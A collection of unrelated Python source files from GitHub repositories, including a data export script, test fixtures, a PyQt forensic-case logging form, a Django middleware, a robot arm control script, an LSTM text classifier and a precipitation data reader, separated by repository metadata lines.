dist_all = {}
dist_nested = {}
for source in pathlib.Path(sources_dir).glob('*.json'):
with source.open('r') as source_file:
source_content = json.load(source_file)
if "config" in source_content:
source_content["config"] = json.loads(source_content["config"])
owner = source_content['owner_org']
try:
with pathlib.Path(orgs_dir, owner+'.json').open('r') as organization:
org_content = json.load(organization)
category = classify(org_content)
dist_nested = populate_dict(category, dist_nested, org_content, source_content)
dist_all[owner] = dist_all.get(owner, dict(org_content, sources=[]))
dist_all[owner]["sources"].append({ k:source_content[k] for k in source_content if keep_owner or source_content[k] != 'owner_org' })
except FileNotFoundError:
print(f"ERROR: file {pathlib.Path(orgs_dir, owner+'.json')} not found or not readable.", file=sys.stderr)
exit(2)
if not dist_nested or not dist_all:
print(f"WARNING: no sources found. Is {pathlib.Path(sources_dir)} the correct folder?", file=sys.stderr)
if to_stdout:
print(json.dumps(dist_all.values(), sort_keys=True, indent=4))
if override or not os.path.exists(dist_filename):
with open(dist_filename, 'w') as output_file:
json.dump(list(dist_all.values()), output_file)
else:
print("ERROR: output file exists and I'm not allowed to overwrite it.", file=sys.stderr)
if override or not os.path.exists(nested_filename):
with open(nested_filename, 'w') as output_file:
json.dump(dist_nested, output_file)
else:
print("ERROR: output file exists and I'm not allowed to overwrite it.", file=sys.stderr)
### THE SCRIPT
if __name__ == '__main__':
parse()
|
italia/public-opendata-sources
|
export_all.py
|
export_all.py
|
py
| 8,264 |
python
|
en
|
code
| 17 |
github-code
|
6
|
2078438087
|
# -*- coding: utf-8 -*-
from django_webtest import DjangoTestApp, WebTestMixin
import pytest
from testapp.articles.factories import AuthorFactory, ArticleFactory, TeamFactory
@pytest.fixture(scope='function')
def app(request):
wtm = WebTestMixin()
wtm._patch_settings()
wtm._disable_csrf_checks()
request.addfinalizer(wtm._unpatch_settings)
return DjangoTestApp()
@pytest.fixture(scope='function')
def data(request):
teams = [
TeamFactory()
for x in range(0, 2)
]
authors = [
AuthorFactory(team=team)
for team in teams
for x in range(0, 5)
]
articles = [
ArticleFactory(author=author)
for author in authors
for x in range(0, 10)
]
return {
'teams': teams,
'authors': authors,
'articles': articles,
}
|
odoku/django-searchview
|
tests/conftest.py
|
conftest.py
|
py
| 846 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16314867701
|
import sqlite3
import sys
import datetime
from collections import defaultdict
from stats_ui_window import Ui_StatWindow
from PyQt5 import QtCore, QtGui, QtWidgets
class MainWindow_EXEC():
def __init__(self):
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
self.ui = Ui_StatWindow()
self.ui.setupUi(MainWindow)
with open('examiners_names.txt','r') as examiners:
for line in examiners.readlines():
self.ui.comboBox.addItem(line.strip())
self.device_list = []
self.ui.pushButton.clicked.connect(self.add_device)
self.ui.pushButton_4.clicked.connect(self.remove_record)
self.ui.pushButton_2.clicked.connect(self.add_list)
self.ui.pushButton_3.clicked.connect(QtCore.QCoreApplication.instance().quit)
MainWindow.show()
sys.exit(app.exec_())
def add_device(self):
device_values = defaultdict()
device_values['case_number'] = self.ui.lineEdit.text()
device_values['item_number'] = self.ui.lineEdit_2.text()
device_values['manufacture'] = self.ui.lineEdit_3.text()
device_values['model_'] = self.ui.lineEdit_4.text()
device_values['crime_code'] = self.ui.lineEdit_6.text()
device_values['requesting'] = self.ui.lineEdit_5.text()
device_values['examiner'] = str(self.ui.comboBox.currentText())
if "" in (device_values['case_number'],device_values['item_number'],
device_values['manufacture'],device_values['model_'],
device_values['crime_code'],device_values['requesting']):
self.error_box()
else:
all_items = True
if self.ui.radioButton_11.isChecked():
device_values['device'] = "Computer"
elif self.ui.radioButton_10.isChecked():
device_values['device'] = "Phone"
elif self.ui.radioButton_12.isChecked():
device_values['device'] = "Hard Drive"
elif self.ui.radioButton_13.isChecked():
device_values['device'] = "Thumbdrive/Media Card"
elif self.ui.radioButton_14.isChecked():
device_values['device'] = "Vehilce"
else:
all_items = False
self.error_box(message = "Please Select Device Type")
if self.ui.radioButton.isChecked():
device_values['security'] = "Password Protected"
elif self.ui.radioButton_9.isChecked():
device_values['security'] = "Unlocked"
else:
all_items = False
self.error_box(message = "Please Select Security")
if self.ui.checkBox_2.isChecked():
device_values['secure_start'] = "Enabled"
else: device_values['secure_start'] = "No"
if self.ui.checkBox_3.isChecked():
device_values['logical'] = "Yes"
else: device_values['logical'] = "No"
if self.ui.checkBox_4.isChecked():
device_values['file_system'] = "Yes"
else: device_values['file_system'] = "No"
if self.ui.checkBox_5.isChecked():
device_values['physical'] = "Yes"
else: device_values['physical'] = "No"
if self.ui.checkBox_8.isChecked():
device_values['lt_greykey'] = "Yes"
else: device_values['lt_greykey'] = "No"
if self.ui.checkBox_6.isChecked():
device_values['greykey'] = "Yes"
else: device_values['greykey'] = "No"
if self.ui.checkBox_7.isChecked():
device_values['no_extraction'] = "No Extraction"
else: device_values['no_extraction'] = "Extracted"
device_values['date'] = datetime.datetime.now().strftime('%m/%d/%Y')
if all_items == True:
self.device_list.append(device_values)
self.ui.tableWidget.insertRow(0)
self.ui.tableWidget.setItem(0 , 0, QtWidgets.QTableWidgetItem(device_values['date']))
self.ui.tableWidget.setItem(0 , 1, QtWidgets.QTableWidgetItem(device_values['device']))
self.ui.tableWidget.setItem(0 , 2, QtWidgets.QTableWidgetItem(device_values['case_number']))
self.ui.tableWidget.setItem(0 , 3, QtWidgets.QTableWidgetItem(device_values['item_number']))
self.ui.tableWidget.setItem(0 , 4, QtWidgets.QTableWidgetItem(device_values['manufacture']))
self.ui.tableWidget.setItem(0 , 5, QtWidgets.QTableWidgetItem(device_values['model_']))
self.ui.lineEdit_2.setText("")
self.ui.lineEdit_3.setText("")
self.ui.lineEdit_4.setText("")
self.ui.checkBox_2.setChecked(False)
self.ui.checkBox_3.setChecked(False)
self.ui.checkBox_4.setChecked(False)
self.ui.checkBox_5.setChecked(False)
self.ui.checkBox_6.setChecked(False)
self.ui.checkBox_7.setChecked(False)
self.ui.checkBox_8.setChecked(False)
else: all_items = True
def remove_record(self):
row = self.ui.tableWidget.currentRow()
self.ui.tableWidget.removeRow(row)
def add_list(self):
manufacture = self.ui.lineEdit_3.text()
if manufacture != "":
self.error_box(message = "Dont forget to add the phone")
else:
self.ui.lineEdit.setText("")
self.ui.lineEdit_2.setText("")
self.ui.lineEdit_3.setText("")
self.ui.lineEdit_4.setText("")
self.ui.lineEdit_6.setText("")
self.ui.lineEdit_5.setText("")
count = self.ui.tableWidget.rowCount()
if count > 0:
self.ui.tableWidget.setRowCount(0)
with open('path.txt','r') as my_path:
path = my_path.read()
con = sqlite3.connect(path)
cur = con.cursor()
for item in self.device_list:
val = (item['date'],item['case_number'],item['item_number'],item['manufacture'],
item['model_'],item['crime_code'],item['requesting'],
item['examiner'],item['device'],item['security'],
item['secure_start'],item['logical'],item['file_system'],
item['physical'],item['lt_greykey'],item['greykey'],item['no_extraction'])
sql = "INSERT INTO entries (date,case_number,item_number,manufacture,model_,crime_code,requesting,examiner,device,security,secure_start,logical,file_system,physical,lt_greykey,greykey,no_extraction) VALUES (?,?, ?, ?, ?, ?, ?, ?,?, ?,?,?,?,?,?,?,?)"
cur.execute(sql,val)
con.commit()
con.close()
@staticmethod
def error_box(message = 'Please fill out all fields!'):
error_dialog = QtWidgets.QMessageBox()
error_dialog.setIcon(QtWidgets.QMessageBox.Warning)
error_dialog.setWindowTitle('Error')
error_dialog.setText(f'{message}')
error_dialog.setStandardButtons(QtWidgets.QMessageBox.Close)
error_dialog.exec()
if __name__ == "__main__":
MainWindow_EXEC()
|
chrisw706/examination_stats
|
Stats/Python/Stats.py
|
Stats.py
|
py
| 7,488 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33595344312
|
from django.http import JsonResponse
from base.views import chekctoken
WHITE_URLS = ( '/apis/login/')
class RequestMideleware(object):
def process_request(self, request):
if request.path_info in WHITE_URLS:
return
try:
ret = chekctoken(request)
if not ret:
response =JsonResponse({'result': 'Unauthorized'})
response.status_code = 401
return response
except:
return
|
Hchenwy/web
|
www/server/base/middleware.py
|
middleware.py
|
py
| 514 |
python
|
en
|
code
| 0 |
github-code
|
6
|
24961044066
|
#!/usr/bin/env python
from std_msgs.msg import String
from math import pi
from sensor_msgs.msg import PointCloud2
import rospy
import sensor_msgs.point_cloud2 as pc2
import ros_numpy
import numpy as np
import sys
import copy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
# UR Robot
robot = None
group = None
scene = None
display_trajectory_publisher = None
init_pose = (-0.2784,0.092,0.42,0.073,0.695,0.711,0.0717)
capture_ready = False
# UR Robot initialization
def ur3_init():
global robot,group,scene,display_trajectory_publisher
## First initialize moveit_commander and rospy.
#print "============ Starting system"
moveit_commander.roscpp_initialize(sys.argv)
#rospy.init_node('move_group_python_interface_tutorial',
# anonymous=True)
## Instantiate a RobotCommander object. This object is an interface to
## the robot as a whole.
robot = moveit_commander.RobotCommander()
## Instantiate a PlanningSceneInterface object. This object is an interface
## to the world surrounding the robot.
scene = moveit_commander.PlanningSceneInterface()
## Instantiate a MoveGroupCommander object. This object is an interface
## to one group of joints. In this case the group is the joints in the ur3
## arm. This interface can be used to plan and execute motions on the ur3
## arm.
group = moveit_commander.MoveGroupCommander("ur3")
## We create this DisplayTrajectory publisher which is used below to publish
## trajectories for RVIZ to visualize.
display_trajectory_publisher = rospy.Publisher(
'/move_group/display_planned_path',
moveit_msgs.msg.DisplayTrajectory)
# Set robot goal based on end_effector
def ur3_set_end_effector_goal_quat(pos_x,pos_y,pos_z,qx,qy,qz,qw):
global robot,group,scene,display_trajectory_publisher
current_pose = group.get_current_pose().pose
#print ("Original Pose Information")
#print (current_pose)
# XYZ are in terms of meters
x = 0
y = 0
z = 0
#Yaw,pitch and roll should be in degree
# They are all relative to base link coorindates
roll = 10
yaw = 183
pitch = 180
pose_goal = geometry_msgs.msg.Pose()
#Q = euler_to_quaternion(yaw , pitch, roll)
#print Q
pose_goal.orientation.x = qx
pose_goal.orientation.y = qy
pose_goal.orientation.z = qz
pose_goal.orientation.w = qw
pose_goal.position.x = pos_x
pose_goal.position.y = pos_y
pose_goal.position.z = pos_z
group.set_pose_target(pose_goal)
plan = group.go(wait=True)
group.stop()
current_pose = group.get_current_pose().pose
#print ("------------ Target Pose Information ------------")
#print (current_pose)
group.clear_pose_targets()
#print ("[INFO] Goal of end effector is arrived")
|
vincent51689453/ur3_edge_follower
|
src/edge_follower/ur_robot.py
|
ur_robot.py
|
py
| 2,802 |
python
|
en
|
code
| 0 |
github-code
|
6
|
9137033058
|
import os
import pandas as pd
from scipy.io import loadmat
def load_data():
list_of_files = os.listdir("data\\Identification\\MFCC\\")
cumulative_df = pd.DataFrame()
for file in list_of_files:
data_set = loadmat("data\\Identification\\MFCC\\" + file)
features = data_set['feat']
labels = data_set['Y']
features_df = pd.DataFrame(features)
labels_df = pd.DataFrame(labels, columns=["Subject", "Session"])
combined_df = pd.concat([features_df, labels_df], axis=1)
cumulative_df = pd.concat(
[cumulative_df, combined_df]).sort_values(by="Subject")
return cumulative_df
def load_file(filename):
data_set = loadmat("data\\Identification\\MFCC\\" + str(filename))
features = data_set['feat']
labels = data_set['Y']
features_df = pd.DataFrame(features)
labels_df = pd.DataFrame(labels, columns=["Subject", "Session"])
combined_df = pd.concat([features_df, labels_df], axis=1)
return combined_df
|
PGG106/ReadMat
|
utils.py
|
utils.py
|
py
| 1,004 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37188371889
|
import os
import csv
import math
import numpy as np
import nltk
from nltk.corpus import stopwords
import collections
import string
import re
from sklearn.model_selection import KFold
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras.preprocessing.text import Tokenizer
import time
cachedStopWords = stopwords.words("english")
if __name__ == '__main__':
print("Starting Main")
startTime = time.time()
x = []
y = []
fraud = []
radical = []
violence = []
with open("annotPart1.csv",'r', encoding="utf8") as csvFile:
reader = csv.reader(csvFile)
p = 0
for row in reader:
if(len(row) == 5 and p != 0):
x.append(row[1])
temp = []
temp.append(0 if row[2] == '0' else 1)
temp.append(0 if row[3] == '0' else 1)
temp.append(0 if row[4] == '0' else 1)
fraud.append(0 if row[2] == '0' else 1)
radical.append(0 if row[3] == '0' else 1)
violence.append(0 if row[4] == '0' else 1)
y.append(temp)
p = p + 1
csvFile.close
with open("annot_part2.csv",'r', encoding="utf8") as csvFile:
reader = csv.reader(csvFile)
p = 0
for row in reader:
if(len(row) == 5 and p != 0):
x.append(row[1])
temp = []
temp.append(0 if row[2] == '0' else 1)
temp.append(0 if row[3] == '0' else 1)
temp.append(0 if row[4] == '0' else 1)
fraud.append(0 if row[2] == '0' else 1)
radical.append(0 if row[3] == '0' else 1)
violence.append(0 if row[4] == '0' else 1)
y.append(temp)
p = p + 1
csvFile.close
print("Size of x:",len(x)," Size of y:",len(y))
X = []
for t in x:
t = re.sub(r'[^\w\s]',' ',t)
t = ' '.join([word for word in t.split() if word != " "])
t = t.lower()
t = ' '.join([word for word in t.split() if word not in cachedStopWords])
X.append(t)
print("Type of X:",type(X))
Features = X
Fraud = fraud
Radical = radical
Violence = violence
kf = KFold(n_splits=10)
iteration = 0
gFraudAccu = 0
gRadicalAccu = 0
gViolenceAccu = 0
gTotalAccu = 0
vocabSize = 50000
tokenizer = Tokenizer(num_words= vocabSize)
tokenised = tokenizer.fit_on_texts(X)
for train_index, test_index in kf.split(Features):
iteration += 1
print("\n\n\n\nMaking nueral Network for iteration:",iteration)
iterStart = time.time()
#Making Training and Testing Data
X_Train = [Features[x] for x in train_index]
X_Test = [Features[x] for x in test_index]
fraudTrain = [Fraud[x] for x in train_index]
fraudTest = [Fraud[x] for x in test_index]
radicalTrain = [Radical[x] for x in train_index]
radicalTest = [Radical[x] for x in test_index]
violenceTrain = [Violence[x] for x in train_index]
violenceTest = [Violence[x] for x in test_index]
tokenisedTrain = tokenizer.texts_to_sequences(X_Train)
tokenisedTest = tokenizer.texts_to_sequences(X_Test)
max_review_length = 180
X_Train = sequence.pad_sequences(tokenisedTrain, maxlen=max_review_length,padding='post')
X_Test = sequence.pad_sequences(tokenisedTest, maxlen=max_review_length,padding='post')
#Fraud
fraudModel = Sequential()
fraudModel.add(Embedding(50000, 100, input_length=max_review_length))
fraudModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2))
fraudModel.add(Dense(1, activation='sigmoid'))
fraudModel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
fraudModel.fit(X_Train,fraudTrain,epochs=10, batch_size=100)
fraudScore = fraudModel.evaluate(X_Test,fraudTest,verbose = 100)
accuFraudLstm = fraudScore[1]
fraudEndTime = time.time()
print("\nFraud Training Done for Iteration",iteration,"\nTime:",fraudEndTime - iterStart)
positiveFraud = [x for x in fraudTest if x == 1]
print("Number of positive Examples : ",len(positiveFraud), " ratio : ", (len(positiveFraud) / len(fraudTest)) )
#Radical
radicalModel = Sequential()
radicalModel.add(Embedding(50000, 100, input_length=max_review_length))
radicalModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2))
radicalModel.add(Dense(1, activation='sigmoid'))
radicalModel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
radicalModel.fit(X_Train,radicalTrain,epochs=10, batch_size=100)
radicalScore = radicalModel.evaluate(X_Test,radicalTest,verbose = 100)
accuRadicalLstm = radicalScore[1]
radicalEndTime = time.time()
print("\nRadical Training Done for Iteration",iteration,"\nTime:",radicalEndTime - fraudEndTime)
positiveRadical = [x for x in radicalTest if x == 1]
print("Number of positive Examples : ",len(positiveRadical), " ratio : ", (len(positiveRadical) / len(radicalTest)) )
#Violence
violenceModel = Sequential()
violenceModel.add(Embedding(50000, 100, input_length=max_review_length))
violenceModel.add(LSTM(100, dropout=0.2, recurrent_dropout=0.2))
violenceModel.add(Dense(1, activation='sigmoid'))
violenceModel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
violenceModel.fit(X_Train,violenceTrain,epochs=10, batch_size=100)
violenceScore = violenceModel.evaluate(X_Test,violenceTest,verbose = 100)
accuViolenceLstm = violenceScore[1]
violenceEndTime = time.time()
print("\nViolence Training Done for Iteration",iteration,"\nTime:",violenceEndTime - radicalEndTime)
positiveViolence = [x for x in violenceTest if x == 1]
print("Number of positive Examples : ",len(positiveViolence), " ratio : ", (len(positiveViolence) / len(violenceTest)) )
totalAccu = (accuViolenceLstm + accuRadicalLstm + accuFraudLstm) / 3
gFraudAccu += accuFraudLstm
gViolenceAccu += accuViolenceLstm
gRadicalAccu += accuRadicalLstm
gTotalAccu += totalAccu
iterEndTime = time.time()
print("\n\nAccuracyScores for LSTM Iteration:",iteration,"\nFraud: ",accuFraudLstm,"\nRadical: ",accuRadicalLstm,"\nViolence: ",accuViolenceLstm,"\nTotal Accuracy:",totalAccu,"\nTotal Time:",iterEndTime - iterStart)
gFraudAccu /= 10
gViolenceAccu /= 10
gRadicalAccu /= 10
gTotalAccu /= 10
endTime = time.time()
print("\n\n\n\nOverall AccuracyScores for LSTM :","\nFraud: ",gFraudAccu,"\nRadical: ",gRadicalAccu,"\nViolence: ",gViolenceAccu,"\nTotal Accuracy:",gTotalAccu,"\nTime:",endTime - startTime)
|
arinjayakhare1/Real-Time-Tweet-Classifier-using-RLAN
|
test/old codes/testWithThreads/initTrainer/old Programs/initTrainer.py
|
initTrainer.py
|
py
| 6,270 |
python
|
en
|
code
| 0 |
github-code
|
6
|
11706943391
|
from string import ascii_lowercase, ascii_uppercase
from utils.data import read_data_as_list
characters = list(ascii_lowercase) + list(ascii_uppercase)
priority_lookup = dict(zip(characters, range(1, len(characters) + 1)))
rucksacks = read_data_as_list(day=3)
# Part 1
total = 0
for rucksack in rucksacks:
midpoint = len(rucksack) // 2
compartment_1, compartment_2 = rucksack[:midpoint], rucksack[midpoint:]
common_item = set(compartment_1).intersection(compartment_2).pop()
priority = priority_lookup[common_item]
total += priority
print(f'Part 1 Solution: {total}')
# Part 2
total = 0
for i in range(0, len(rucksacks), 3):
rucksack_1, rucksack_2, rucksack_3 = rucksacks[i: i+3]
common_item = set(rucksack_1).intersection(rucksack_2).intersection(rucksack_3).pop()
priority = priority_lookup[common_item]
total += priority
print(f'Part 2 Solution: {total}')
|
stuartjwright/advent_of_code_2022
|
day_03.py
|
day_03.py
|
py
| 902 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73499996027
|
import numpy as np
from numpy import ma
import xarray as xr
from netCDF4 import Dataset
import struct
import sys
import os
import datetime as dt
import glob
"""
This module contains functions for reading external data
to use with LPT.
The data_read_function is called at various points in other LPT functions.
To add a new data set, do the following:
1) Write a read function similar to read_generic_netcdf below.
2) Add an "elif" option that calls that function in readdata
"""
################################################################################
def readdata(datetime_to_read, dataset_options_dict, verbose=None):
"""
Main data read function. Get data at datetime datetime_to_read.
Based on the oprions in dataset_options_dict, it will look in the data directory
and use the rain function specified below.
To add a dataset type, add an elif block to this function.
The function is expected to return a dictionary with keys 'lon', 'lat', and 'data'
Verbose option (new 05/2023):
- If set to None (default), it will use the verbose option from dataset_options_dict.
- Otherwise, the value will be used *instead of* dataset_options_dict.
This allows a function call to override the setting in dataset_options_dict.
"""
## Manage verbose
if verbose is None:
verbose_actual = dataset_options_dict['verbose']
else:
verbose_actual = verbose
if dataset_options_dict['raw_data_format'] == 'generic_netcdf':
variable_names = (dataset_options_dict['longitude_variable_name']
, dataset_options_dict['latitude_variable_name']
, dataset_options_dict['field_variable_name'])
DATA = read_generic_netcdf_at_datetime(datetime_to_read
, variable_names = variable_names
, data_dir = dataset_options_dict['raw_data_parent_dir']
, fmt = dataset_options_dict['file_name_format']
, verbose = verbose_actual)
elif dataset_options_dict['raw_data_format'] == 'generic_netcdf_with_multiple_times':
variable_names = (dataset_options_dict['longitude_variable_name']
, dataset_options_dict['latitude_variable_name']
, dataset_options_dict['time_variable_name']
, dataset_options_dict['field_variable_name'])
DATA = read_generic_netcdf_at_datetime(datetime_to_read
, variable_names = variable_names
, dt_to_use = datetime_to_read
, data_dir = dataset_options_dict['raw_data_parent_dir']
, fmt = dataset_options_dict['file_name_format']
, verbose = verbose_actual)
elif dataset_options_dict['raw_data_format'] == 'cmorph':
DATA = read_cmorph_at_datetime(datetime_to_read
, area = dataset_options_dict['area']
, data_dir = dataset_options_dict['raw_data_parent_dir']
, fmt = dataset_options_dict['file_name_format']
, verbose = verbose_actual)
elif dataset_options_dict['raw_data_format'] == 'imerg_hdf5':
DATA = read_imerg_hdf5_at_datetime(datetime_to_read
, area = dataset_options_dict['area']
, data_dir = dataset_options_dict['raw_data_parent_dir']
, fmt = dataset_options_dict['file_name_format']
, verbose = verbose_actual)
elif dataset_options_dict['raw_data_format'] == 'cfs_forecast':
fcst_hour = int((datetime_to_read - dataset_options_dict['datetime_init']).total_seconds()/3600)
fcst_resolution_hours = dataset_options_dict['data_time_interval']
if fcst_hour < 1: # There is no data in the file for fcst = 0. Use 6h fcst values.
records = [1,]
else:
records = [int(fcst_hour/fcst_resolution_hours),]
DATA = read_cfs_rt_at_datetime(dataset_options_dict['datetime_init'] # datetime_to_read
, data_dir = dataset_options_dict['raw_data_parent_dir']
, fmt = dataset_options_dict['file_name_format']
, records = records
, verbose = verbose_actual)
DATA['data'] = ma.masked_array(DATA['precip'][0])
## -- Add an elif block here for new datasets. --
else:
print(('ERROR! '+dataset_options_dict['raw_data_format'] + ' is not a valid raw_data_format!'), flush=True)
DATA = None
return DATA
################################################################################
## Read functions for generic NetCDF data.
################################################################################
def read_generic_netcdf(fn, variable_names=('lon','lat','rain'), dt_to_use=None):
"""
DATA = read_generic_netcdf(fn)
output is like this:
list(DATA)
Out[12]: ['lon', 'lat', 'precip']
In [21]: DATA['lon'].shape
Out[21]: (1440,)
In [22]: DATA['lat'].shape
Out[22]: (400,)
In [23]: DATA['precip'].shape
Out[23]: (400, 1440)
"""
DATA = {}
with xr.open_dataset(fn) as DS:
DATA['lon'] = DS[variable_names[0]].values
DATA['lat'] = DS[variable_names[1]].values
## If no time variable, just retrieve the 2-D data as it is.
if not dt_to_use is None: #'time' in list(DS.variables):
DATA['data'] = DS.sel({variable_names[2]:str(dt_to_use)},method='nearest')[variable_names[3]].values
else:
DATA['data'] = DS[variable_names[2]].values
DATA['data'] = np.ma.masked_array(DATA['data'], mask=np.isnan(DATA['data']))
## Need to get from (-180, 180) to (0, 360) longitude.
lon_lt_0, = np.where(DATA['lon'] < -0.0001)
lon_ge_0, = np.where(DATA['lon'] > -0.0001)
if len(lon_lt_0) > 0:
DATA['lon'][lon_lt_0] += 360.0
DATA['lon'] = np.concatenate((DATA['lon'][lon_ge_0], DATA['lon'][lon_lt_0]))
DATA['data'] = np.concatenate((DATA['data'][:,lon_ge_0], DATA['data'][:,lon_lt_0]), axis=1)
return DATA
def read_generic_netcdf_at_datetime(dt, data_dir='.'
, variable_names=('lon','lat','rain'), dt_to_use=None, fmt='gridded_rain_rates_%Y%m%d%H.nc'
, verbose=False):
fn = (data_dir + '/' + dt.strftime(fmt))
DATA=None
if not os.path.exists(fn):
print('File not found: ', fn)
else:
if verbose:
print(fn)
DATA=read_generic_netcdf(fn,
variable_names = variable_names,
dt_to_use = dt_to_use)
return DATA
################################################################################
## Read functions for specific datasets.
################################################################################
"""
CMORPH reading functions.
"""
def read_cmorph_rt_bin(fn, area=[0,360,-90,90]):
"""
DATA = read_cmorph_rt_bin(fn)
DATA is a dict with keys lon, lat, and precip.
CMORPH RT files are binary.
The GrADS control file below is used as the basis for this function:
DSET ^../%y4/%y4%m2/CMORPH_V0.x_RT_8km-30min_%y4%m2%d2%h2
OPTIONS little_endian template
UNDEF -999.0
TITLE CMORPH Rain Rate (Real-Time Version)
XDEF 4948 LINEAR 0.0363783345 0.072756669
YDEF 1649 LINEAR -59.963614312 0.072771376
ZDEF 1 LEVELS 1
TDEF 99999 LINEAR 00:00z01Jan2017 30mn
VARS 1
cmorph 1 99 CMORPH Rain Rate [mm/hr]
ENDVARS
"""
dtype=np.dtype([('field1', '<i2')])
DATA={}
DATA['lon'] = np.arange(0.0363783345, 360.0, 0.072756669)
DATA['lat'] = np.arange(-59.963614312, 60.0, 0.072771376)
fid = open(fn,'rb')
## GrADS uses FORTRAN REAL values, which is np.float32 for Python.
DATA['data'] = np.fromfile(fid, dtype=np.float32, count=2*4948*1649)
if sys.byteorder == 'big': # Data is little endian.
DATA['data'] = DATA['data'].byteswap()
## Shape and scale the data.
DATA['data'] = np.reshape(np.double(DATA['data']), [2, 1649, 4948])
DATA['data'][DATA['data'] < -0.001] = 0.0 # Usually, missing high latitude data.
fid.close()
## Cut out area.
keep_lon, = np.where(np.logical_and(DATA['lon'] > area[0], DATA['lon'] < area[1]))
keep_lat, = np.where(np.logical_and(DATA['lat'] > area[2], DATA['lat'] < area[3]))
DATA['lon'] = DATA['lon'][keep_lon[0]:keep_lon[-1]+1]
DATA['lat'] = DATA['lat'][keep_lat[0]:keep_lat[-1]+1]
DATA['data'] = DATA['data'][:, keep_lat[0]:keep_lat[-1]+1, keep_lon[0]:keep_lon[-1]+1]
DATA['data'] = 0.5*(DATA['data'][0,:,:] + DATA['data'][1,:,:])
return DATA
def read_cmorph_at_datetime(dt_this, force_rt=False, data_dir='.'
, fmt='CMORPH_V0.x_RT_8km-30min_%Y%m%d%H'
, verbose=False, area=[0,360,-90,90]):
"""
DATA = read_cmorph_at_datetime(dt, force_rt=False, verbose=False)
DATA is a dict with keys lon, lat, and precip.
Based on the provided datetime dt, read in the CMORPH data.
By default, it will first check for the research product,
and use the realtime product if the research product was not found.
However, if force_rt = True, it just uses the realtime product.
"""
## First try research product
fn = (data_dir + '/' + dt_this.strftime(fmt))
if verbose:
print(fn)
DATA = read_cmorph_rt_bin(fn, area=area)
DATA['data'] = ma.masked_array(DATA['data'])
return DATA
def read_imerg_hdf5_at_datetime(dt_this, force_rt=False, data_dir='.'
, fmt='%Y/%m/%d/3B-HHR.MS.MRG.3IMERG.%Y%m%d-S%H*.HDF5'
, verbose=False, area=[0,360,-90,90]):
"""
DATA = read_imerg_hdf5_at_datetime(dt_this, force_rt=False, data_dir='.'
, fmt='%Y/%m/%d/3B-HHR.MS.MRG.3IMERG.%Y%m%d-S%H*.HDF5'
, verbose=False, area=[0,360,-90,90])
DATA is a dict with keys lon, lat, and precip.
Based on the provided datetime dt, read in the IMERG HDF data.
By default, it will first check for the final product,
and use the "late" realtime product if the final product was not found.
However, if force_rt = True, it just uses the "late" realtime product.
(It will search for a filename with modified fmt to check for "late" product
- append 'late/' to the front of the directory path.
- replace '3B-HHR' with '3B-HHR-L').
"""
fn_list = sorted(glob.glob(data_dir + '/' + dt_this.strftime(fmt)))
if len(fn_list) < 1:
if not force_rt:
## Try "late" realtime data.
print('Final data version not found. Trying to use late realtime data instead.')
fmt_rt = 'late/' + fmt.replace('3B-HHR','3B-HHR-L')
fn_list = sorted(glob.glob(data_dir + '/' + dt_this.strftime(fmt_rt)))
if len(fn_list) < 1:
print('WARNING: No input data found.')
fn = fn_list[0]
if verbose:
print(fn)
with Dataset(fn) as DS:
lon_rain = DS['Grid']['lon'][:]
lat_rain = DS['Grid']['lat'][:]
rain = DS['Grid']['precipitationCal'][:][0].T
if len(fn_list) > 1:
fn = fn_list[1]
if verbose:
print(fn)
with Dataset(fn) as DS:
rain30 = DS['Grid']['precipitationCal'][:][0].T
rain = 0.5 * (rain + rain30)
## lon -180:0 --> 180:360
idx_neg_lon = [x for x in range(len(lon_rain)) if lon_rain[x] < -0.0001]
idx_pos_lon = [x for x in range(len(lon_rain)) if lon_rain[x] > -0.0001]
lon_rain = np.append(lon_rain[idx_pos_lon[0]:idx_pos_lon[-1]+1], 360.0 + lon_rain[idx_neg_lon[0]:idx_neg_lon[-1]+1], axis=0)
rain = np.append(rain[:,idx_pos_lon[0]:idx_pos_lon[-1]+1], rain[:,idx_neg_lon[0]:idx_neg_lon[-1]+1], axis=1)
DATA={}
DATA['lon'] = lon_rain
DATA['lat'] = lat_rain
DATA['data'] = ma.masked_array(rain)
## Cut out area.
keep_lon, = np.where(np.logical_and(DATA['lon'] > area[0], DATA['lon'] < area[1]))
keep_lat, = np.where(np.logical_and(DATA['lat'] > area[2], DATA['lat'] < area[3]))
DATA['lon'] = DATA['lon'][keep_lon[0]:keep_lon[-1]+1]
DATA['lat'] = DATA['lat'][keep_lat[0]:keep_lat[-1]+1]
DATA['data'] = DATA['data'][keep_lat[0]:keep_lat[-1]+1, keep_lon[0]:keep_lon[-1]+1]
return DATA
################################################################################
################################################################################
################################################################################
"""
CFS Grib2 reading function
"""
def read_cfs_rt_at_datetime(dt_this, data_dir = './'
, fmt = 'cfs.%Y%m%d/%H/time_grib_01/prate.01.%Y%m%d%H.daily.grb2'
, records=range(1,45*4+1), verbose=False):
fn = (data_dir + '/' + dt_this.strftime(fmt))
if verbose:
print(fn, flush=True)
return read_cfs_rt_grib2(fn, records=records, verbose=verbose)
def read_cfs_rt_grib2(fn, records=range(1,45*4+1), verbose=False):
"""
RT = read_cfs_rt_grib2(fn, records=N)
N is the list of records to get.
By default, get the first 45 days, 6 hourly intervals.
example output:
In [23]: RT['lon'].shape
Out[23]: (384,)
In [24]: RT['lat'].shape
Out[24]: (190,)
In [25]: RT['precip'].shape
Out[25]: (180, 190, 384)
"""
import gdal # Import gdal if dealing with grib data.
DS = gdal.Open(fn, gdal.GA_ReadOnly)
width = DS.RasterXSize
height = DS.RasterYSize
lon = np.arange(0.0,359.062 + 0.5,0.938)
## grid file with Gaussian latitude was obtained from wgrib2 like this:
## wgrib2 -d 1 -gridout grid.txt /home/orca/data/model_fcst_grib/cfs/cfs.20190508/00/time_grib_01/prate.01.2019050800.daily.grb2
